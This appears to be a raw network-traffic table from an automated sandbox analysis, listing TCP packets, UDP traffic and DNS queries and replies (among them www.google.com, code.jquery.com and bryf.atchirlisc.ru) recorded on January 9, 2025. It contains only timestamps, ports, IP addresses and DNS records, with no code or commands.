                                                                                                                                                                                    Jan 9, 2025 15:30:10.258341074 CET44349810172.64.41.3192.168.2.4
                                                                                                                                                                                    Jan 9, 2025 15:30:10.258421898 CET49809443192.168.2.4172.64.41.3
                                                                                                                                                                                    Jan 9, 2025 15:30:10.258444071 CET44349809172.64.41.3192.168.2.4
                                                                                                                                                                                    Jan 9, 2025 15:30:10.259304047 CET44349812172.64.41.3192.168.2.4
                                                                                                                                                                                    Jan 9, 2025 15:30:10.259336948 CET44349812172.64.41.3192.168.2.4
                                                                                                                                                                                    Jan 9, 2025 15:30:10.259388924 CET49812443192.168.2.4172.64.41.3
                                                                                                                                                                                    Jan 9, 2025 15:30:10.261740923 CET49812443192.168.2.4172.64.41.3
                                                                                                                                                                                    Jan 9, 2025 15:30:10.261821985 CET44349812172.64.41.3192.168.2.4
                                                                                                                                                                                    Jan 9, 2025 15:30:10.261984110 CET44349811172.64.41.3192.168.2.4
                                                                                                                                                                                    Jan 9, 2025 15:30:10.262015104 CET44349811172.64.41.3192.168.2.4
                                                                                                                                                                                    Jan 9, 2025 15:30:10.262058020 CET49811443192.168.2.4172.64.41.3
                                                                                                                                                                                    Jan 9, 2025 15:30:10.262373924 CET44349810172.64.41.3192.168.2.4
                                                                                                                                                                                    Jan 9, 2025 15:30:10.262408972 CET44349809172.64.41.3192.168.2.4
                                                                                                                                                                                    Jan 9, 2025 15:30:10.262412071 CET44349810172.64.41.3192.168.2.4
                                                                                                                                                                                    Jan 9, 2025 15:30:10.262435913 CET49810443192.168.2.4172.64.41.3
                                                                                                                                                                                    Jan 9, 2025 15:30:10.262448072 CET44349809172.64.41.3192.168.2.4
                                                                                                                                                                                    Jan 9, 2025 15:30:10.262476921 CET49809443192.168.2.4172.64.41.3
                                                                                                                                                                                    Jan 9, 2025 15:30:10.263570070 CET49811443192.168.2.4172.64.41.3
                                                                                                                                                                                    Jan 9, 2025 15:30:10.263811111 CET49809443192.168.2.4172.64.41.3
                                                                                                                                                                                    Jan 9, 2025 15:30:10.264005899 CET44349811172.64.41.3192.168.2.4
                                                                                                                                                                                    Jan 9, 2025 15:30:10.264287949 CET49810443192.168.2.4172.64.41.3
                                                                                                                                                                                    Jan 9, 2025 15:30:10.264327049 CET49812443192.168.2.4172.64.41.3
                                                                                                                                                                                    Jan 9, 2025 15:30:10.264345884 CET44349812172.64.41.3192.168.2.4
                                                                                                                                                                                    Jan 9, 2025 15:30:10.264421940 CET49811443192.168.2.4172.64.41.3
                                                                                                                                                                                    Jan 9, 2025 15:30:10.264439106 CET44349811172.64.41.3192.168.2.4
                                                                                                                                                                                    Jan 9, 2025 15:30:10.264550924 CET44349810172.64.41.3192.168.2.4
                                                                                                                                                                                    Jan 9, 2025 15:30:10.264707088 CET44349809172.64.41.3192.168.2.4
                                                                                                                                                                                    Jan 9, 2025 15:30:10.370444059 CET44349812172.64.41.3192.168.2.4
                                                                                                                                                                                    Jan 9, 2025 15:30:10.370765924 CET49812443192.168.2.4172.64.41.3
                                                                                                                                                                                    Jan 9, 2025 15:30:10.370771885 CET44349811172.64.41.3192.168.2.4
                                                                                                                                                                                    Jan 9, 2025 15:30:10.371288061 CET49811443192.168.2.4172.64.41.3
                                                                                                                                                                                    Jan 9, 2025 15:30:10.374355078 CET49811443192.168.2.4172.64.41.3
                                                                                                                                                                                    Jan 9, 2025 15:30:10.374397993 CET44349811172.64.41.3192.168.2.4
                                                                                                                                                                                    Jan 9, 2025 15:30:10.374969006 CET49812443192.168.2.4172.64.41.3
                                                                                                                                                                                    Jan 9, 2025 15:30:10.374999046 CET44349812172.64.41.3192.168.2.4
                                                                                                                                                                                    Jan 9, 2025 15:30:10.385174036 CET49809443192.168.2.4172.64.41.3
                                                                                                                                                                                    Jan 9, 2025 15:30:10.385188103 CET44349809172.64.41.3192.168.2.4
                                                                                                                                                                                    Jan 9, 2025 15:30:10.385413885 CET49810443192.168.2.4172.64.41.3
                                                                                                                                                                                    Jan 9, 2025 15:30:10.385438919 CET44349810172.64.41.3192.168.2.4
                                                                                                                                                                                    Jan 9, 2025 15:30:10.533428907 CET49809443192.168.2.4172.64.41.3
                                                                                                                                                                                    Jan 9, 2025 15:30:10.533693075 CET49810443192.168.2.4172.64.41.3
                                                                                                                                                                                    Jan 9, 2025 15:30:11.313406944 CET49809443192.168.2.4172.64.41.3
                                                                                                                                                                                    Jan 9, 2025 15:30:11.313613892 CET49810443192.168.2.4172.64.41.3
                                                                                                                                                                                    Jan 9, 2025 15:30:11.355331898 CET44349810172.64.41.3192.168.2.4
                                                                                                                                                                                    Jan 9, 2025 15:30:11.355344057 CET44349809172.64.41.3192.168.2.4
                                                                                                                                                                                    Jan 9, 2025 15:30:11.414886951 CET44349810172.64.41.3192.168.2.4
                                                                                                                                                                                    Jan 9, 2025 15:30:11.414994955 CET44349810172.64.41.3192.168.2.4
                                                                                                                                                                                    Jan 9, 2025 15:30:11.415056944 CET49810443192.168.2.4172.64.41.3
                                                                                                                                                                                    Jan 9, 2025 15:30:11.415235996 CET49810443192.168.2.4172.64.41.3
                                                                                                                                                                                    Jan 9, 2025 15:30:11.415261030 CET44349810172.64.41.3192.168.2.4
                                                                                                                                                                                    Jan 9, 2025 15:30:11.429024935 CET44349809172.64.41.3192.168.2.4
                                                                                                                                                                                    Jan 9, 2025 15:30:11.429114103 CET44349809172.64.41.3192.168.2.4
                                                                                                                                                                                    Jan 9, 2025 15:30:11.429166079 CET49809443192.168.2.4172.64.41.3
                                                                                                                                                                                    Jan 9, 2025 15:30:11.430179119 CET49809443192.168.2.4172.64.41.3
                                                                                                                                                                                    Jan 9, 2025 15:30:11.430200100 CET44349809172.64.41.3192.168.2.4
                                                                                                                                                                                    Jan 9, 2025 15:30:25.624159098 CET49836443192.168.2.4172.64.41.3
                                                                                                                                                                                    Jan 9, 2025 15:30:25.624177933 CET44349836172.64.41.3192.168.2.4
                                                                                                                                                                                    Jan 9, 2025 15:30:25.624238968 CET49836443192.168.2.4172.64.41.3
                                                                                                                                                                                    Jan 9, 2025 15:30:25.624888897 CET49837443192.168.2.4172.64.41.3
                                                                                                                                                                                    Jan 9, 2025 15:30:25.624967098 CET44349837172.64.41.3192.168.2.4
                                                                                                                                                                                    Jan 9, 2025 15:30:25.625030994 CET49837443192.168.2.4172.64.41.3
                                                                                                                                                                                    Jan 9, 2025 15:30:25.627554893 CET49836443192.168.2.4172.64.41.3
                                                                                                                                                                                    Jan 9, 2025 15:30:25.627568007 CET44349836172.64.41.3192.168.2.4
                                                                                                                                                                                    Jan 9, 2025 15:30:25.627868891 CET49837443192.168.2.4172.64.41.3
                                                                                                                                                                                    Jan 9, 2025 15:30:25.627887964 CET44349837172.64.41.3192.168.2.4
                                                                                                                                                                                    Jan 9, 2025 15:30:26.085026026 CET44349836172.64.41.3192.168.2.4
                                                                                                                                                                                    Jan 9, 2025 15:30:26.085455894 CET49836443192.168.2.4172.64.41.3
                                                                                                                                                                                    Jan 9, 2025 15:30:26.085489035 CET44349836172.64.41.3192.168.2.4
                                                                                                                                                                                    Jan 9, 2025 15:30:26.085812092 CET44349836172.64.41.3192.168.2.4
                                                                                                                                                                                    Jan 9, 2025 15:30:26.086216927 CET49836443192.168.2.4172.64.41.3
                                                                                                                                                                                    Jan 9, 2025 15:30:26.086277008 CET44349836172.64.41.3192.168.2.4
                                                                                                                                                                                    Jan 9, 2025 15:30:26.086414099 CET49836443192.168.2.4172.64.41.3
                                                                                                                                                                                    Jan 9, 2025 15:30:26.097587109 CET44349837172.64.41.3192.168.2.4
                                                                                                                                                                                    Jan 9, 2025 15:30:26.097793102 CET49837443192.168.2.4172.64.41.3
                                                                                                                                                                                    Jan 9, 2025 15:30:26.097819090 CET44349837172.64.41.3192.168.2.4
                                                                                                                                                                                    Jan 9, 2025 15:30:26.098129988 CET44349837172.64.41.3192.168.2.4
                                                                                                                                                                                    Jan 9, 2025 15:30:26.098393917 CET49837443192.168.2.4172.64.41.3
                                                                                                                                                                                    Jan 9, 2025 15:30:26.098462105 CET44349837172.64.41.3192.168.2.4
                                                                                                                                                                                    Jan 9, 2025 15:30:26.098484993 CET49837443192.168.2.4172.64.41.3
                                                                                                                                                                                    Jan 9, 2025 15:30:26.127368927 CET44349836172.64.41.3192.168.2.4
                                                                                                                                                                                    Jan 9, 2025 15:30:26.139333963 CET44349837172.64.41.3192.168.2.4
                                                                                                                                                                                    Jan 9, 2025 15:30:26.146680117 CET49837443192.168.2.4172.64.41.3
                                                                                                                                                                                    Jan 9, 2025 15:30:26.213017941 CET44349836172.64.41.3192.168.2.4
                                                                                                                                                                                    Jan 9, 2025 15:30:26.213088036 CET44349836172.64.41.3192.168.2.4
                                                                                                                                                                                    Jan 9, 2025 15:30:26.213139057 CET49836443192.168.2.4172.64.41.3
                                                                                                                                                                                    Jan 9, 2025 15:30:26.213287115 CET49836443192.168.2.4172.64.41.3
                                                                                                                                                                                    Jan 9, 2025 15:30:26.213299990 CET44349836172.64.41.3192.168.2.4
                                                                                                                                                                                    Jan 9, 2025 15:30:26.230937004 CET44349837172.64.41.3192.168.2.4
                                                                                                                                                                                    Jan 9, 2025 15:30:26.231009960 CET44349837172.64.41.3192.168.2.4
                                                                                                                                                                                    Jan 9, 2025 15:30:26.231076002 CET49837443192.168.2.4172.64.41.3
                                                                                                                                                                                    Jan 9, 2025 15:30:26.231187105 CET49837443192.168.2.4172.64.41.3
                                                                                                                                                                                    Jan 9, 2025 15:30:26.231221914 CET44349837172.64.41.3192.168.2.4
                                                                                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                    Jan 9, 2025 15:29:34.337666035 CET53647731.1.1.1192.168.2.4
                                                                                                                                                                                    Jan 9, 2025 15:29:34.346571922 CET53564291.1.1.1192.168.2.4
                                                                                                                                                                                    Jan 9, 2025 15:29:35.423463106 CET53539371.1.1.1192.168.2.4
                                                                                                                                                                                    Jan 9, 2025 15:29:38.226120949 CET5669753192.168.2.41.1.1.1
                                                                                                                                                                                    Jan 9, 2025 15:29:38.226258993 CET5891153192.168.2.41.1.1.1
                                                                                                                                                                                    Jan 9, 2025 15:29:38.232898951 CET53566971.1.1.1192.168.2.4
                                                                                                                                                                                    Jan 9, 2025 15:29:38.233186960 CET53589111.1.1.1192.168.2.4
                                                                                                                                                                                    Jan 9, 2025 15:29:40.501955986 CET4933153192.168.2.41.1.1.1
                                                                                                                                                                                    Jan 9, 2025 15:29:40.501955986 CET6497253192.168.2.41.1.1.1
                                                                                                                                                                                    Jan 9, 2025 15:29:40.662868977 CET53649721.1.1.1192.168.2.4
                                                                                                                                                                                    Jan 9, 2025 15:29:40.743475914 CET53493311.1.1.1192.168.2.4
                                                                                                                                                                                    Jan 9, 2025 15:29:42.721478939 CET5965053192.168.2.41.1.1.1
                                                                                                                                                                                    Jan 9, 2025 15:29:42.721640110 CET4978253192.168.2.41.1.1.1
                                                                                                                                                                                    Jan 9, 2025 15:29:42.728362083 CET53497821.1.1.1192.168.2.4
                                                                                                                                                                                    Jan 9, 2025 15:29:42.729137897 CET53596501.1.1.1192.168.2.4
                                                                                                                                                                                    Jan 9, 2025 15:29:44.415335894 CET53591621.1.1.1192.168.2.4
                                                                                                                                                                                    Jan 9, 2025 15:29:44.526279926 CET5642153192.168.2.41.1.1.1
                                                                                                                                                                                    Jan 9, 2025 15:29:44.526664972 CET5738753192.168.2.41.1.1.1
                                                                                                                                                                                    Jan 9, 2025 15:29:44.532800913 CET53564211.1.1.1192.168.2.4
                                                                                                                                                                                    Jan 9, 2025 15:29:44.532946110 CET53573871.1.1.1192.168.2.4
                                                                                                                                                                                    Jan 9, 2025 15:29:45.032638073 CET5142253192.168.2.41.1.1.1
                                                                                                                                                                                    Jan 9, 2025 15:29:45.032812119 CET5451153192.168.2.41.1.1.1
                                                                                                                                                                                    Jan 9, 2025 15:29:45.039570093 CET53545111.1.1.1192.168.2.4
                                                                                                                                                                                    Jan 9, 2025 15:29:45.039789915 CET53514221.1.1.1192.168.2.4
                                                                                                                                                                                    Jan 9, 2025 15:29:51.826726913 CET138138192.168.2.4192.168.2.255
                                                                                                                                                                                    Jan 9, 2025 15:29:52.360317945 CET53613391.1.1.1192.168.2.4
                                                                                                                                                                                    Jan 9, 2025 15:30:05.477596045 CET6051253192.168.2.41.1.1.1
                                                                                                                                                                                    Jan 9, 2025 15:30:05.478039026 CET5392053192.168.2.41.1.1.1
                                                                                                                                                                                    Jan 9, 2025 15:30:05.831532001 CET6314953192.168.2.41.1.1.1
                                                                                                                                                                                    Jan 9, 2025 15:30:05.831687927 CET5469353192.168.2.41.1.1.1
                                                                                                                                                                                    Jan 9, 2025 15:30:05.838831902 CET53631491.1.1.1192.168.2.4
                                                                                                                                                                                    Jan 9, 2025 15:30:05.838879108 CET53546931.1.1.1192.168.2.4
                                                                                                                                                                                    Jan 9, 2025 15:30:08.167016983 CET5417053192.168.2.41.1.1.1
                                                                                                                                                                                    Jan 9, 2025 15:30:08.167496920 CET5315253192.168.2.41.1.1.1
                                                                                                                                                                                    Jan 9, 2025 15:30:08.168422937 CET5897653192.168.2.41.1.1.1
                                                                                                                                                                                    Jan 9, 2025 15:30:08.168576002 CET4980953192.168.2.41.1.1.1
                                                                                                                                                                                    Jan 9, 2025 15:30:08.173793077 CET53541701.1.1.1192.168.2.4
                                                                                                                                                                                    Jan 9, 2025 15:30:08.174688101 CET53531521.1.1.1192.168.2.4
                                                                                                                                                                                    Jan 9, 2025 15:30:08.175107002 CET53589761.1.1.1192.168.2.4
                                                                                                                                                                                    Jan 9, 2025 15:30:08.175276041 CET53498091.1.1.1192.168.2.4
                                                                                                                                                                                    Jan 9, 2025 15:30:08.308744907 CET5920953192.168.2.41.1.1.1
                                                                                                                                                                                    Jan 9, 2025 15:30:08.309092999 CET5103953192.168.2.41.1.1.1
                                                                                                                                                                                    Jan 9, 2025 15:30:08.315620899 CET53592091.1.1.1192.168.2.4
                                                                                                                                                                                    Jan 9, 2025 15:30:08.316144943 CET53510391.1.1.1192.168.2.4
                                                                                                                                                                                    Jan 9, 2025 15:30:09.248230934 CET51522443192.168.2.4172.64.41.3
                                                                                                                                                                                    Jan 9, 2025 15:30:09.559098005 CET51522443192.168.2.4172.64.41.3
                                                                                                                                                                                    Jan 9, 2025 15:30:10.258914948 CET51522443192.168.2.4172.64.41.3
                                                                                                                                                                                    Jan 9, 2025 15:30:11.459470987 CET51522443192.168.2.4172.64.41.3
                                                                                                                                                                                    Jan 9, 2025 15:30:11.503670931 CET53575421.1.1.1192.168.2.4
                                                                                                                                                                                    Jan 9, 2025 15:30:11.902086973 CET44351522172.64.41.3192.168.2.4
                                                                                                                                                                                    Jan 9, 2025 15:30:11.902565002 CET44351522172.64.41.3192.168.2.4
                                                                                                                                                                                    Jan 9, 2025 15:30:11.902602911 CET44351522172.64.41.3192.168.2.4
                                                                                                                                                                                    Jan 9, 2025 15:30:11.903934002 CET51522443192.168.2.4172.64.41.3
                                                                                                                                                                                    Jan 9, 2025 15:30:11.905992031 CET51522443192.168.2.4172.64.41.3
                                                                                                                                                                                    Jan 9, 2025 15:30:11.906133890 CET51522443192.168.2.4172.64.41.3
                                                                                                                                                                                    Jan 9, 2025 15:30:12.001528978 CET44351522172.64.41.3192.168.2.4
                                                                                                                                                                                    Jan 9, 2025 15:30:12.001566887 CET44351522172.64.41.3192.168.2.4
                                                                                                                                                                                    Jan 9, 2025 15:30:12.001595020 CET44351522172.64.41.3192.168.2.4
                                                                                                                                                                                    Jan 9, 2025 15:30:12.001622915 CET44351522172.64.41.3192.168.2.4
                                                                                                                                                                                    Jan 9, 2025 15:30:12.030936956 CET51522443192.168.2.4172.64.41.3
                                                                                                                                                                                    Jan 9, 2025 15:30:12.031059027 CET51522443192.168.2.4172.64.41.3
                                                                                                                                                                                    Jan 9, 2025 15:30:12.124305964 CET44351522172.64.41.3192.168.2.4
                                                                                                                                                                                    Jan 9, 2025 15:30:12.181611061 CET51522443192.168.2.4172.64.41.3
                                                                                                                                                                                    Jan 9, 2025 15:30:13.360277891 CET51522443192.168.2.4172.64.41.3
                                                                                                                                                                                    Jan 9, 2025 15:30:13.360775948 CET51522443192.168.2.4172.64.41.3
                                                                                                                                                                                    Jan 9, 2025 15:30:13.455225945 CET44351522172.64.41.3192.168.2.4
                                                                                                                                                                                    Jan 9, 2025 15:30:13.456422091 CET44351522172.64.41.3192.168.2.4
                                                                                                                                                                                    Jan 9, 2025 15:30:13.456962109 CET44351522172.64.41.3192.168.2.4
                                                                                                                                                                                    Jan 9, 2025 15:30:13.457423925 CET51522443192.168.2.4172.64.41.3
                                                                                                                                                                                    Jan 9, 2025 15:30:13.865211964 CET51522443192.168.2.4172.64.41.3
                                                                                                                                                                                    Jan 9, 2025 15:30:13.870004892 CET51522443192.168.2.4172.64.41.3
                                                                                                                                                                                    Jan 9, 2025 15:30:13.960602999 CET44351522172.64.41.3192.168.2.4
                                                                                                                                                                                    Jan 9, 2025 15:30:13.962418079 CET44351522172.64.41.3192.168.2.4
                                                                                                                                                                                    Jan 9, 2025 15:30:13.965167999 CET44351522172.64.41.3192.168.2.4
                                                                                                                                                                                    Jan 9, 2025 15:30:13.966348886 CET44351522172.64.41.3192.168.2.4
                                                                                                                                                                                    Jan 9, 2025 15:30:13.967181921 CET51522443192.168.2.4172.64.41.3
                                                                                                                                                                                    Jan 9, 2025 15:30:14.187623978 CET51522443192.168.2.4172.64.41.3
                                                                                                                                                                                    Jan 9, 2025 15:30:14.187815905 CET51522443192.168.2.4172.64.41.3
                                                                                                                                                                                    Jan 9, 2025 15:30:14.282540083 CET44351522172.64.41.3192.168.2.4
                                                                                                                                                                                    Jan 9, 2025 15:30:14.285866022 CET44351522172.64.41.3192.168.2.4
                                                                                                                                                                                    Jan 9, 2025 15:30:14.287353039 CET44351522172.64.41.3192.168.2.4
                                                                                                                                                                                    Jan 9, 2025 15:30:14.287558079 CET51522443192.168.2.4172.64.41.3
                                                                                                                                                                                    Jan 9, 2025 15:30:24.289236069 CET51522443192.168.2.4172.64.41.3
                                                                                                                                                                                    Jan 9, 2025 15:30:24.289438009 CET51522443192.168.2.4172.64.41.3
                                                                                                                                                                                    Jan 9, 2025 15:30:24.384367943 CET44351522172.64.41.3192.168.2.4
                                                                                                                                                                                    Jan 9, 2025 15:30:24.388209105 CET44351522172.64.41.3192.168.2.4
                                                                                                                                                                                    Jan 9, 2025 15:30:24.398545980 CET44351522172.64.41.3192.168.2.4
                                                                                                                                                                                    Jan 9, 2025 15:30:24.398869991 CET51522443192.168.2.4172.64.41.3
                                                                                                                                                                                    Jan 9, 2025 15:30:25.623815060 CET62106443192.168.2.4172.64.41.3
                                                                                                                                                                                    Jan 9, 2025 15:30:25.928313971 CET62106443192.168.2.4172.64.41.3
                                                                                                                                                                                    Jan 9, 2025 15:30:26.113758087 CET44362106172.64.41.3192.168.2.4
                                                                                                                                                                                    Jan 9, 2025 15:30:26.113811016 CET44362106172.64.41.3192.168.2.4
                                                                                                                                                                                    Jan 9, 2025 15:30:26.113828897 CET44362106172.64.41.3192.168.2.4
                                                                                                                                                                                    Jan 9, 2025 15:30:26.113847017 CET44362106172.64.41.3192.168.2.4
                                                                                                                                                                                    Jan 9, 2025 15:30:26.116820097 CET62106443192.168.2.4172.64.41.3
                                                                                                                                                                                    Jan 9, 2025 15:30:26.117398024 CET62106443192.168.2.4172.64.41.3
                                                                                                                                                                                    Jan 9, 2025 15:30:26.117511988 CET62106443192.168.2.4172.64.41.3
                                                                                                                                                                                    Jan 9, 2025 15:30:26.212227106 CET44362106172.64.41.3192.168.2.4
                                                                                                                                                                                    Jan 9, 2025 15:30:26.212269068 CET44362106172.64.41.3192.168.2.4
                                                                                                                                                                                    Jan 9, 2025 15:30:26.212299109 CET44362106172.64.41.3192.168.2.4
                                                                                                                                                                                    Jan 9, 2025 15:30:26.212327957 CET44362106172.64.41.3192.168.2.4
                                                                                                                                                                                    Jan 9, 2025 15:30:26.212769032 CET62106443192.168.2.4172.64.41.3
                                                                                                                                                                                    Jan 9, 2025 15:30:26.212769032 CET62106443192.168.2.4172.64.41.3
                                                                                                                                                                                    Jan 9, 2025 15:30:26.307612896 CET44362106172.64.41.3192.168.2.4
                                                                                                                                                                                    Jan 9, 2025 15:30:26.334522963 CET62106443192.168.2.4172.64.41.3
                                                                                                                                                                                    Jan 9, 2025 15:30:34.349581957 CET53616671.1.1.1192.168.2.4
                                                                                                                                                                                    Jan 9, 2025 15:30:34.738567114 CET53554741.1.1.1192.168.2.4
                                                                                                                                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                    Jan 9, 2025 15:29:38.226120949 CET192.168.2.41.1.1.10x5b2cStandard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                    Jan 9, 2025 15:29:38.226258993 CET192.168.2.41.1.1.10x5fc7Standard query (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                    Jan 9, 2025 15:29:40.501955986 CET192.168.2.41.1.1.10x4e44Standard query (0)bryf.atchirlisc.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                    Jan 9, 2025 15:29:40.501955986 CET192.168.2.41.1.1.10x94dfStandard query (0)bryf.atchirlisc.ru65IN (0x0001)false
                                                                                                                                                                                    Jan 9, 2025 15:29:42.721478939 CET192.168.2.41.1.1.10x9a2eStandard query (0)code.jquery.comA (IP address)IN (0x0001)false
                                                                                                                                                                                    Jan 9, 2025 15:29:42.721640110 CET192.168.2.41.1.1.10x6e0dStandard query (0)code.jquery.com65IN (0x0001)false
                                                                                                                                                                                    Jan 9, 2025 15:29:44.526279926 CET192.168.2.41.1.1.10xf17dStandard query (0)a.nel.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                                                                                                    Jan 9, 2025 15:29:44.526664972 CET192.168.2.41.1.1.10x753cStandard query (0)a.nel.cloudflare.com65IN (0x0001)false
                                                                                                                                                                                    Jan 9, 2025 15:29:45.032638073 CET192.168.2.41.1.1.10x50eStandard query (0)code.jquery.comA (IP address)IN (0x0001)false
                                                                                                                                                                                    Jan 9, 2025 15:29:45.032812119 CET192.168.2.41.1.1.10x4675Standard query (0)code.jquery.com65IN (0x0001)false
                                                                                                                                                                                    Jan 9, 2025 15:30:05.477596045 CET192.168.2.41.1.1.10x6640Standard query (0)bzib.nelreports.netA (IP address)IN (0x0001)false
                                                                                                                                                                                    Jan 9, 2025 15:30:05.478039026 CET192.168.2.41.1.1.10x6e67Standard query (0)bzib.nelreports.net65IN (0x0001)false
                                                                                                                                                                                    Jan 9, 2025 15:30:05.831532001 CET192.168.2.41.1.1.10xe4f2Standard query (0)clients2.googleusercontent.comA (IP address)IN (0x0001)false
                                                                                                                                                                                    Jan 9, 2025 15:30:05.831687927 CET192.168.2.41.1.1.10x35f3Standard query (0)clients2.googleusercontent.com65IN (0x0001)false
                                                                                                                                                                                    Jan 9, 2025 15:30:08.167016983 CET192.168.2.41.1.1.10x3143Standard query (0)chrome.cloudflare-dns.comA (IP address)IN (0x0001)false
                                                                                                                                                                                    Jan 9, 2025 15:30:08.167496920 CET192.168.2.41.1.1.10x9979Standard query (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                    Jan 9, 2025 15:30:08.168422937 CET192.168.2.41.1.1.10x8015Standard query (0)chrome.cloudflare-dns.comA (IP address)IN (0x0001)false
                                                                                                                                                                                    Jan 9, 2025 15:30:08.168576002 CET192.168.2.41.1.1.10xb5c8Standard query (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                    Jan 9, 2025 15:30:08.308744907 CET192.168.2.41.1.1.10x9f84Standard query (0)chrome.cloudflare-dns.comA (IP address)IN (0x0001)false
                                                                                                                                                                                    Jan 9, 2025 15:30:08.309092999 CET192.168.2.41.1.1.10x21aStandard query (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                    Jan 9, 2025 15:29:38.232898951 CET1.1.1.1192.168.2.40x5b2cNo error (0)www.google.com142.250.186.68A (IP address)IN (0x0001)false
                                                                                                                                                                                    Jan 9, 2025 15:29:38.233186960 CET1.1.1.1192.168.2.40x5fc7No error (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                    Jan 9, 2025 15:29:40.662868977 CET1.1.1.1192.168.2.40x94dfNo error (0)bryf.atchirlisc.ru65IN (0x0001)false
                                                                                                                                                                                    Jan 9, 2025 15:29:40.743475914 CET1.1.1.1192.168.2.40x4e44No error (0)bryf.atchirlisc.ru104.21.80.1A (IP address)IN (0x0001)false
                                                                                                                                                                                    Jan 9, 2025 15:29:40.743475914 CET1.1.1.1192.168.2.40x4e44No error (0)bryf.atchirlisc.ru104.21.96.1A (IP address)IN (0x0001)false
                                                                                                                                                                                    Jan 9, 2025 15:29:40.743475914 CET1.1.1.1192.168.2.40x4e44No error (0)bryf.atchirlisc.ru104.21.16.1A (IP address)IN (0x0001)false
                                                                                                                                                                                    Jan 9, 2025 15:29:40.743475914 CET1.1.1.1192.168.2.40x4e44No error (0)bryf.atchirlisc.ru104.21.32.1A (IP address)IN (0x0001)false
                                                                                                                                                                                    Jan 9, 2025 15:29:40.743475914 CET1.1.1.1192.168.2.40x4e44No error (0)bryf.atchirlisc.ru104.21.112.1A (IP address)IN (0x0001)false
                                                                                                                                                                                    Jan 9, 2025 15:29:40.743475914 CET1.1.1.1192.168.2.40x4e44No error (0)bryf.atchirlisc.ru104.21.64.1A (IP address)IN (0x0001)false
                                                                                                                                                                                    Jan 9, 2025 15:29:40.743475914 CET1.1.1.1192.168.2.40x4e44No error (0)bryf.atchirlisc.ru104.21.48.1A (IP address)IN (0x0001)false
                                                                                                                                                                                    Jan 9, 2025 15:29:42.729137897 CET1.1.1.1192.168.2.40x9a2eNo error (0)code.jquery.com151.101.130.137A (IP address)IN (0x0001)false
                                                                                                                                                                                    Jan 9, 2025 15:29:42.729137897 CET1.1.1.1192.168.2.40x9a2eNo error (0)code.jquery.com151.101.2.137A (IP address)IN (0x0001)false
                                                                                                                                                                                    Jan 9, 2025 15:29:42.729137897 CET1.1.1.1192.168.2.40x9a2eNo error (0)code.jquery.com151.101.66.137A (IP address)IN (0x0001)false
                                                                                                                                                                                    Jan 9, 2025 15:29:42.729137897 CET1.1.1.1192.168.2.40x9a2eNo error (0)code.jquery.com151.101.194.137A (IP address)IN (0x0001)false
                                                                                                                                                                                    Jan 9, 2025 15:29:44.532800913 CET1.1.1.1192.168.2.40xf17dNo error (0)a.nel.cloudflare.com35.190.80.1A (IP address)IN (0x0001)false
                                                                                                                                                                                    Jan 9, 2025 15:29:45.039789915 CET1.1.1.1192.168.2.40x50eNo error (0)code.jquery.com151.101.2.137A (IP address)IN (0x0001)false
                                                                                                                                                                                    Jan 9, 2025 15:29:45.039789915 CET1.1.1.1192.168.2.40x50eNo error (0)code.jquery.com151.101.194.137A (IP address)IN (0x0001)false
                                                                                                                                                                                    Jan 9, 2025 15:29:45.039789915 CET1.1.1.1192.168.2.40x50eNo error (0)code.jquery.com151.101.130.137A (IP address)IN (0x0001)false
                                                                                                                                                                                    Jan 9, 2025 15:29:45.039789915 CET1.1.1.1192.168.2.40x50eNo error (0)code.jquery.com151.101.66.137A (IP address)IN (0x0001)false
                                                                                                                                                                                    Jan 9, 2025 15:30:05.484891891 CET1.1.1.1192.168.2.40x6640No error (0)bzib.nelreports.netbzib.nelreports.net.akamaized.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                    Jan 9, 2025 15:30:05.485204935 CET1.1.1.1192.168.2.40x6e67No error (0)bzib.nelreports.netbzib.nelreports.net.akamaized.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                    Jan 9, 2025 15:30:05.838831902 CET1.1.1.1192.168.2.40xe4f2No error (0)clients2.googleusercontent.comgooglehosted.l.googleusercontent.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                    Jan 9, 2025 15:30:05.838831902 CET1.1.1.1192.168.2.40xe4f2No error (0)googlehosted.l.googleusercontent.com142.250.186.129A (IP address)IN (0x0001)false
                                                                                                                                                                                    Jan 9, 2025 15:30:05.838879108 CET1.1.1.1192.168.2.40x35f3No error (0)clients2.googleusercontent.comgooglehosted.l.googleusercontent.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                    Jan 9, 2025 15:30:06.472146034 CET1.1.1.1192.168.2.40xce30No error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.nets-part-0017.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                    Jan 9, 2025 15:30:06.472146034 CET1.1.1.1192.168.2.40xce30No error (0)s-part-0017.t-0009.t-msedge.net13.107.246.45A (IP address)IN (0x0001)false
                                                                                                                                                                                    Jan 9, 2025 15:30:07.580172062 CET1.1.1.1192.168.2.40x2a79No error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.nets-part-0017.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                    Jan 9, 2025 15:30:07.580172062 CET1.1.1.1192.168.2.40x2a79No error (0)s-part-0017.t-0009.t-msedge.net13.107.246.45A (IP address)IN (0x0001)false
                                                                                                                                                                                    Jan 9, 2025 15:30:08.173793077 CET1.1.1.1192.168.2.40x3143No error (0)chrome.cloudflare-dns.com172.64.41.3A (IP address)IN (0x0001)false
                                                                                                                                                                                    Jan 9, 2025 15:30:08.173793077 CET1.1.1.1192.168.2.40x3143No error (0)chrome.cloudflare-dns.com162.159.61.3A (IP address)IN (0x0001)false
